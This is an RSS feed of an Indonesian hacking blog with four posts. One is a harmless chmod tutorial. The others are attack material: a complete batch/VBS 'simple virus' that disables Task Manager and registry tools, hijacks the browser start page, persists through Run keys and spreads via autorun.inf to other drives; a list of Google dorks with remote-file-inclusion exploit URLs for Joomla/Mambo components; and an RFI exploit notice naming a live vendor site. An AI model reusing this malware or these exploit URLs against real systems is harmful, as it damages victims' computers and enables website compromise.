<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>bR0m0c0Ra&#039;s Blog</title>
	<atom:link href="http://br0m0c0ra.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://br0m0c0ra.wordpress.com</link>
	<description>Just another WordPress.com weblog</description>
	<lastBuildDate>Sun, 10 Jan 2010 00:57:32 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='br0m0c0ra.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>bR0m0c0Ra&#039;s Blog</title>
		<link>http://br0m0c0ra.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://br0m0c0ra.wordpress.com/osd.xml" title="bR0m0c0Ra&#039;s Blog" />
	<atom:link rel='hub' href='http://br0m0c0ra.wordpress.com/?pushpress=hub'/>
		<item>
		<title>CHMOD UNIX</title>
		<link>http://br0m0c0ra.wordpress.com/2010/01/09/30/</link>
		<comments>http://br0m0c0ra.wordpress.com/2010/01/09/30/#comments</comments>
		<pubDate>Sat, 09 Jan 2010 23:51:17 +0000</pubDate>
		<dc:creator>br0m0c0ra</dc:creator>
				<category><![CDATA[L1nUX]]></category>
		<category><![CDATA[711]]></category>
		<category><![CDATA[755]]></category>
		<category><![CDATA[chmod]]></category>
		<category><![CDATA[download]]></category>
		<category><![CDATA[embed swf]]></category>
		<category><![CDATA[file hidden in server]]></category>
		<category><![CDATA[mikrotik]]></category>
		<category><![CDATA[rwx]]></category>
		<category><![CDATA[widget]]></category>

		<guid isPermaLink="false">http://br0m0c0ra.wordpress.com/?p=30</guid>
		<description><![CDATA[~::Sekilas CHMOD::~ ————- Dalam Hal ini kita akan membahas sedikit masalah CHMOD ( Change Mode ). apa itu chmod : Chmod digunakan untuk menambah dan mengurangi ijin pemakai untuk mengakses file atau direktori, dapat juga menggunakan sistem numeric coding atau sistem letter coding. Ada tiga jenis permisi atau perijinan yang dapat dirubah yaitu : -r [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=br0m0c0ra.wordpress.com&amp;blog=9814395&amp;post=30&amp;subd=br0m0c0ra&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><strong>~::Sekilas CHMOD</strong>::~<br />
————-</p>
<p>Dalam Hal ini kita akan membahas sedikit masalah CHMOD ( Change Mode ).</p>
<p>apa itu chmod :</p>
<p>Chmod digunakan untuk menambah dan mengurangi ijin pemakai untuk mengakses file<br />
atau direktori, dapat juga menggunakan sistem numeric coding atau sistem letter coding.<br />
Ada tiga jenis permisi atau perijinan yang dapat dirubah yaitu :</p>
<p>-r untuk read.<br />
-w untuk write.<br />
-x untuk execute.</p>
<p>keterangan numeric dari sebuah permision file :<span id="more-30"></span></p>
<p>0 = tidak ada operasi di ijinkan.<br />
1 = permisi untuk melakukan cd ke satu direktori.<br />
2 = permisi untuk menulis.<br />
4 = permisi untuk membaca.</p>
<p>setiap file mempunyai permisi untuk owner, group, and user.</p>
<p>untuk membuat batasan-batasan pada suatu file,<br />
kita harus membuat suatu permisi file tersebut dengan cara CHMOD :</p>
<p>misalkan direktori “home” kita mempunyai default permisi 711 maka itu artinya :</p>
<p>7 = 4+2+1 : kamu (pemilik) dapat membaca/menulis/mengeksekusi file.<br />
1 = 1 : semua user di group mu dapat melakukan cd/execute tapi tidak membaca dan menulis.<br />
1 = 1 : semua user bukan group mu dapat melakukan cd/execute tapi tidak membaca dan menulis.</p>
<p>Misalkan direktori public_html kita mempunyai permisi 755 artinya :</p>
<p>7 = 4+2+1 : kamu (pemilik) dapat membaca/menulis/mengeksekusi file.<br />
5 = 4+1 : semua user di group mu dapat melakukan cd/execute/read tapi tidak menulis.<br />
5 = 4+1 : semua user bukan group mu dapat melakukan cd/execute/read tapi tidak menulis.</p>
<p>Files kamu buat di direktori public_html paling sedikit harus mempunyai permisi<br />
644 (direktorinya harus 755) atau WWW server tidak akan bisa membaca nya<br />
sehingga tidak bisa muncul pada web browser.</p>
<p>untuk mengubah permisi file index.html caranya :</p>
<p>chmod 644 index.html</p>
<p>untuk membuat direktori images dan isi file nya bisa di baca oleh semua maka :</p>
<p>chmod 755 images<br />
cd images<br />
chmod 644 *</p>
<p>untuk meng hidden suatu file maka :</p>
<p>chmod 700 nama_file.</p>
<p>——————————————————————-</p>
<p>Users group other<br />
r w x r w x r w x<br />
| | | | | | | | |<br />
400 ——+ | | | | | | | |<br />
200 ——–+ | | | | | | |<br />
100 ———-+ | | | | | |<br />
| | | | | |<br />
40 —————-+ | | | | |<br />
20 ——————+ | | | |<br />
10 ——————–+ | | |<br />
| | |<br />
4 ————————–+ | |<br />
2 —————————-+ |<br />
1 ——————————+</p>
<p>Gambar diagram contoh permisi file.</p>
<p>——————————————————————-</p>
<p>Note : Untuk lebih jelas masalah penggunaan CHMOD silahkan baca man chmod.<br />
Research : http://ibank.cracked.or.id</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/br0m0c0ra.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/br0m0c0ra.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/br0m0c0ra.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/br0m0c0ra.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/br0m0c0ra.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/br0m0c0ra.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/br0m0c0ra.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/br0m0c0ra.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/br0m0c0ra.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/br0m0c0ra.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/br0m0c0ra.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/br0m0c0ra.wordpress.com/30/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/br0m0c0ra.wordpress.com/30/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/br0m0c0ra.wordpress.com/30/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=br0m0c0ra.wordpress.com&amp;blog=9814395&amp;post=30&amp;subd=br0m0c0ra&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://br0m0c0ra.wordpress.com/2010/01/09/30/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d4a2b2e16febdad3d0b6b636fe2f2cb2?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">br0m0c0ra</media:title>
		</media:content>
	</item>
		<item>
		<title>Membuat virus .bat sederhana</title>
		<link>http://br0m0c0ra.wordpress.com/2010/01/08/membuat-virus-bat-sederhana/</link>
		<comments>http://br0m0c0ra.wordpress.com/2010/01/08/membuat-virus-bat-sederhana/#comments</comments>
		<pubDate>Fri, 08 Jan 2010 23:57:36 +0000</pubDate>
		<dc:creator>br0m0c0ra</dc:creator>
				<category><![CDATA[eXpL01t]]></category>
		<category><![CDATA[bat]]></category>
		<category><![CDATA[program bat]]></category>
		<category><![CDATA[virus]]></category>

		<guid isPermaLink="false">http://br0m0c0ra.wordpress.com/2010/01/08/membuat-virus-bat-sederhana/</guid>
		<description><![CDATA[Langkah2nya : 1. Pertama2 buka notepad 2. Copy paste script di bwh ini @echo off taskkill /f /im explorer.exe echo on error resume next&#62;c:windowsanakan.vbs echo set WshShell = CreateObject(”Wscript.Shell”)&#62;&#62;c:windowsanakan.vbs echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoRun “,”1″,”REG_DWORD”&#62;&#62;c:windowsanakan.vbs echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciessystemDisableRegistryTools “,”1″,”REG_DWORD”&#62;&#62;c:windowsanakan.vbs echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoFolderOptions “,”1″,”REG_DWORD”&#62;&#62;c:windowsanakan.vbs echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoFind “,”1″,”REG_DWORD”&#62;&#62;c:windowsanakan.vbs echo WshShell.RegWrite [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=br0m0c0ra.wordpress.com&amp;blog=9814395&amp;post=21&amp;subd=br0m0c0ra&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Langkah2nya :</p>
<p>1. Pertama2 buka notepad<br />
2. Copy paste script di bwh ini</p>
<p>@echo off<br />
taskkill /f /im explorer.exe<br />
echo on error resume next&gt;c:windowsanakan.vbs<br />
echo set WshShell = CreateObject(”Wscript.Shell”)&gt;&gt;c:windowsanakan.vbs<br />
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoRun “,”1″,”REG_DWORD”&gt;&gt;c:windowsanakan.vbs<br />
echo WshShell.RegWrite ” <span id="more-21"></span>HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciessystemDisableRegistryTools “,”1″,”REG_DWORD”&gt;&gt;c:windowsanakan.vbs<br />
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoFolderOptions “,”1″,”REG_DWORD”&gt;&gt;c:windowsanakan.vbs<br />
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciesExplorerNoFind “,”1″,”REG_DWORD”&gt;&gt;c:windowsanakan.vbs<br />
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion PoliciessystemDisableTaskMgr “,”1″,”REG_DWORD”&gt;&gt;c:windowsanakan.vbs<br />
echo WshShell.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMainStart Page”, “http://www.manadocoding.com”,”REG_SZ”&gt;&gt;c:windowsanakan.vbs<br />
echo WshShell.RegWrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOrganization”, “UNIJOYO”,”REG_SZ”&gt;&gt;c:windowsanakan.vbs<br />
echo WshShell.RegWrite “HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionRegisteredOwner”, “vyc0d”,”REG_SZ”&gt;&gt;c:windowsanakan.vbs<br />
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion runmoontr4ck3r “, “C:windowsanakan.vbs”,”REG_SZ”&gt;&gt;c:windowsanakan.vbs<br />
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion runmoontr4ck3rz “, “C:windowscoba.bat”,”REG_SZ”&gt;&gt;c:windowsanakan.vbs<br />
echo WshShell.RegWrite ” HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersion runmoontr4ck3rs “, “C:windowssponsor.bat”,”REG_SZ”&gt;&gt;c:windowsanakan.vbs</p>
<p>echo Title vyc0d Coy….&gt;c:windowssponsor.bat<br />
echo cls&gt;&gt;c:windowssponsor.bat<br />
echo @echo off &gt;&gt;c:windowssponsor.bat<br />
echo @echo **************vyc0d**************&gt;&gt;c:windowssponsor.bat<br />
echo @echo # Komputer Loe Telah gw Kuasai #&gt;&gt;c:windowssponsor.bat<br />
echo @echo # Sorry man.. program kecil kayak gini #&gt;&gt;c:windowssponsor.bat<br />
echo @echo # bisa masuk komp loe… Antivirus lo #&gt;&gt;c:windowssponsor.bat<br />
echo @echo # mana??? koq gak berkutik?????? …. #&gt;&gt;c:windowssponsor.bat<br />
echo @echo # makanya jangan bergantung ama anti #&gt;&gt;c:windowssponsor.bat<br />
echo @echo # virus! dah saatnya kita belajar…. #&gt;&gt;c:windowssponsor.bat<br />
echo @echo # (@_@) #&gt;&gt;c:windowssponsor.bat<br />
echo @echo # salam sayang dr:vyc0d #&gt;&gt;c:windowssponsor.bat<br />
echo @echo # Ups lupa… kalo mau pake komputer #&gt;&gt;c:windowssponsor.bat<br />
echo @echo # tekan spasi saat program ini aktif #&gt;&gt;c:windowssponsor.bat<br />
echo @echo *****************Th4nk5****************&gt;&gt;c:windowssponsor.bat<br />
echo @pause&gt;&gt;c:windowssponsor.bat<br />
echo Title Proses…&gt;&gt;c:windowssponsor.bat<br />
echo @echo load file &gt;&gt;c:windowssponsor.bat<br />
echo @echo kuasai wind#w5 &gt;&gt;c:windowssponsor.bat<br />
echo @echo dan bunuh Kernel32+4ntiviru$ &gt;&gt;c:windowssponsor.bat<br />
echo pause&gt;&gt;c:windowssponsor.bat<br />
echo explorer.exe&gt;&gt;c:windowssponsor.bat<br />
echo Title Proses Scan OS… (*_*)&gt;&gt;c:windowssponsor.bat<br />
echo :loop&gt;&gt;c:windowssponsor.bat<br />
echo @echo 101010011010201020 01010101001010101 0100101001001012 0010100101101010020101 010&gt;&gt;c:windowssponsor.bat<br />
echo @echo 010010101010012110 00101010010100010 0101001010010111 1011010103102020102020 010&gt;&gt;c:windowssponsor.bat<br />
echo @echo 010101101011121011 02010201020030402 1010202030201010 1010201011110102010201 010&gt;&gt;c:windowssponsor.bat<br />
echo goto loop&gt;&gt;c:windowssponsor.bat<br />
echo [autorun]&gt;c:autorun.inf<br />
echo open=coba.bat&gt;&gt;c:autorun.inf<br />
echo shellexecute=coba.bat&gt;&gt;c:autorun.inf<br />
c:windowsanakan.vbs<br />
copy coba.bat c:coba.bat<br />
copy coba.bat d:coba.bat<br />
copy coba.bat e:coban.bat<br />
copy coba.bat c:windowscoba.bat<br />
copy coba.bat f:coba.bat<br />
copy coba.bat g:coba.bat<br />
copy c:autorun.inf d:autorun.inf<br />
copy c:autorun.inf e:autorun.inf<br />
copy c:autorun.inf f:autorun.inf<br />
copy c:autorun.inf g:autorun.inf<br />
@attrib +h +r +s +a c:windowscoba.bat<br />
@attrib +h +r +s +a c:windowsanakan.vbs<br />
@attrib +h +r +s +a c:windowssponsor.bat<br />
@attrib +h +r +s +a c:autorun.inf<br />
@attrib +h +r +s +a c:coba.bat<br />
@attrib +h +r +s +a d:autorun.inf<br />
@attrib +h +r +s +a d:coba.bat<br />
@attrib +h +r +s +a e:autorun.inf<br />
@attrib -h -r -s -a e:coba.bat<br />
@attrib +h +r +s +a f:autorun.inf<br />
@attrib -h -r -s -a f:coba.bat<br />
@attrib +h +r +s +a g:autorun.inf<br />
@attrib -h -r -s -a g:coba.bat</p>
<p>3. Klo sdh, sve dgn nama anakan.bat<br />
4. Aktifkan virus tsb n silanhkan nyengir….hehehee</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/br0m0c0ra.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/br0m0c0ra.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/br0m0c0ra.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/br0m0c0ra.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/br0m0c0ra.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/br0m0c0ra.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/br0m0c0ra.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/br0m0c0ra.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/br0m0c0ra.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/br0m0c0ra.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/br0m0c0ra.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/br0m0c0ra.wordpress.com/21/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/br0m0c0ra.wordpress.com/21/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/br0m0c0ra.wordpress.com/21/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=br0m0c0ra.wordpress.com&amp;blog=9814395&amp;post=21&amp;subd=br0m0c0ra&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://br0m0c0ra.wordpress.com/2010/01/08/membuat-virus-bat-sederhana/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d4a2b2e16febdad3d0b6b636fe2f2cb2?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">br0m0c0ra</media:title>
		</media:content>
	</item>
		<item>
		<title>Mambo &amp; Joomla Script Remote File Inclussion Bugs</title>
		<link>http://br0m0c0ra.wordpress.com/2009/10/11/mambo-joomla-script-remote-file-inclussion-bugs/</link>
		<comments>http://br0m0c0ra.wordpress.com/2009/10/11/mambo-joomla-script-remote-file-inclussion-bugs/#comments</comments>
		<pubDate>Sun, 11 Oct 2009 06:43:43 +0000</pubDate>
		<dc:creator>br0m0c0ra</dc:creator>
				<category><![CDATA[eXpL01t]]></category>
		<category><![CDATA[blind sql injection]]></category>
		<category><![CDATA[exploitasi]]></category>
		<category><![CDATA[Joomla RFI]]></category>
		<category><![CDATA[teknik]]></category>
		<category><![CDATA[tutorial]]></category>
		<category><![CDATA[web-application]]></category>

		<guid isPermaLink="false">http://br0m0c0ra.wordpress.com/2009/10/11/mambo-joomla-script-remote-file-inclussion-bugs/</guid>
		<description><![CDATA[================================================================== Joomla RFI by white semoga bermanfaat ================================================================== Dork: com_comprofiler Expl: administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell] Dork: inurl:com_multibanners Expl: /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell] Dork: inurl:com_colophon expl: administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell] Dork: inurl:index.php?option=[Shell]com_simpleboard Expl: /components/com_simpleboard/file_upload.php?sbp=[Shell] Dork: inurl:”com_hashcash” Expl: /components/com_hashcash/server.php?mosConfig_absolute_path=[Shell] Dork: inurl:”com_htmlarea3_xtd-c” Expl: /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=[Shell] Dork: inurl:”com_sitemap” Expl: /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell] Dork: inurl:”com_forum” Expl: /components/com_forum/download.php?phpbb_root_path=[Shell] Dork: inurl:”com_pccookbook” Expl: /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell] Dork: inurl:index.php?option=[Shell]com_extcalendar Expl: /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell] Dork: inurl:”minibb” Expl: /components/minibb/index.php?absolute_path=[Shell] Dork: inurl:”com_smf” Expl: [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=br0m0c0ra.wordpress.com&amp;blog=9814395&amp;post=14&amp;subd=br0m0c0ra&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>==================================================================</p>
<p>Joomla RFI by white</p>
<p>semoga bermanfaat</p>
<p>==================================================================</p>
<p>Dork:</p>
<p>com_comprofiler</p>
<p>Expl:</p>
<p>administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:com_multibanners</p>
<p>Expl:</p>
<p>/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]<br />
<span id="more-14"></span><br />
Dork:</p>
<p>inurl:com_colophon</p>
<p>expl:</p>
<p>administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:index.php?option=[Shell]com_simpleboard</p>
<p>Expl:</p>
<p>/components/com_simpleboard/file_upload.php?sbp=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_hashcash”</p>
<p>Expl:</p>
<p>/components/com_hashcash/server.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_htmlarea3_xtd-c”</p>
<p>Expl:</p>
<p>/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_sitemap”</p>
<p>Expl:</p>
<p>/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_forum”</p>
<p>Expl:</p>
<p>/components/com_forum/download.php?phpbb_root_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_pccookbook”</p>
<p>Expl:</p>
<p>/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:index.php?option=[Shell]com_extcalendar</p>
<p>Expl:</p>
<p>/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”minibb”</p>
<p>Expl:</p>
<p>/components/minibb/index.php?absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_smf”</p>
<p>Expl:</p>
<p>/components/com_smf/smf.php?mosConfig_absolute_path=[Shell]</p>
<p>Expl:</p>
<p>/modules/mod_calendar.php?absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_pollxt”</p>
<p>Expl:</p>
<p>/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_loudmounth”</p>
<p>Expl:</p>
<p>/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_videodb”</p>
<p>Expl:</p>
<p>/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:index.php?option=[Shell]com_pcchess</p>
<p>Expl:</p>
<p>/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_multibanners”</p>
<p>Expl:</p>
<p>/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_a6mambohelpdesk”</p>
<p>Expl:</p>
<p>/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_colophon”</p>
<p>Expl:</p>
<p>/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_mgm”</p>
<p>Expl:</p>
<p>/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_mambatstaff”</p>
<p>Expl:</p>
<p>/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_securityimages”</p>
<p>Expl:</p>
<p>/components/com_securityimages/configinsert.php?mosConfig_absolute_path=[Shell]</p>
<p>Expl:</p>
<p>/components/com_securityimages/lang.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_artlinks”</p>
<p>Expl:</p>
<p>/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=[Shell]</p>
<p>Dork:</p>
<p>inurl:”com_galleria”</p>
<p>Expl:</p>
<p>/components/com_galleria/galleria.html.php?mosConfig_absolute_path=[Shell]</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/br0m0c0ra.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/br0m0c0ra.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/br0m0c0ra.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/br0m0c0ra.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/br0m0c0ra.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/br0m0c0ra.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/br0m0c0ra.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/br0m0c0ra.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/br0m0c0ra.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/br0m0c0ra.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/br0m0c0ra.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/br0m0c0ra.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/br0m0c0ra.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/br0m0c0ra.wordpress.com/14/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=br0m0c0ra.wordpress.com&amp;blog=9814395&amp;post=14&amp;subd=br0m0c0ra&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://br0m0c0ra.wordpress.com/2009/10/11/mambo-joomla-script-remote-file-inclussion-bugs/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/d4a2b2e16febdad3d0b6b636fe2f2cb2?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">br0m0c0ra</media:title>
		</media:content>
	</item>
		<item>
		<title>Meta Search Engine Script (url)</title>
		<link>http://br0m0c0ra.wordpress.com/2009/10/11/meta-search-engine-script-url/</link>
		<comments>http://br0m0c0ra.wordpress.com/2009/10/11/meta-search-engine-script-url/#comments</comments>
		<pubDate>Sun, 11 Oct 2009 06:40:58 +0000</pubDate>
		<dc:creator>br0m0c0ra</dc:creator>
				<category><![CDATA[eXpL01t]]></category>
		<category><![CDATA[Meta Search Engine 1.0]]></category>

		<guid isPermaLink="false">http://br0m0c0ra.wordpress.com/?p=12</guid>
		<description><![CDATA[============================================================================== _ _ _ _ _ _ / \ &#124; &#124; &#124; &#124; / \ &#124; &#124; &#124; &#124; / _ \ &#124; &#124; &#124; &#124; / _ \ &#124; &#124;_&#124; &#124; / ___ \ &#124; &#124;___ &#124; &#124;___ / ___ \ &#124; _ &#124; IN THE NAME OF /_/ \_\ &#124;_____&#124; &#124;_____&#124; /_/ \_\ [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=br0m0c0ra.wordpress.com&amp;blog=9814395&amp;post=12&amp;subd=br0m0c0ra&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<pre>==============================================================================
                      _      _       _          _      _   _
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] Meta Search Engine 1.0 Remote File Inclusion
==============================================================================
<span id="more-12"></span>
	[»] Script:             [ Meta Search Engine 1.0 ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.mydlstore.com/product.php?productid=40826&amp;cat=0&amp;page=1  ]
	[»] Founder:            [ Moudi &lt;m0udi@9.cn&gt; ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ OFF ]
        [»] Price:              [ USD 12.99 ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit RFI + LIVE : vulnerability ]===

[»] http://www.site.com/patch/?url=[RFI]&amp;file=Search
[»] http://www.site.com/patch/index.php?url=[RFI]&amp;file=Search

[»] http://www.mydlstore.net/metasearch/?url=evilcode.txt?&amp;file=Search
[»] http://www.mydlstore.net/metasearch/index.php?url=evilcode.txt?&amp;file=Search

Author: Moudi

###########################################################################

note: readfile($url) is the issue, so fd
</pre>
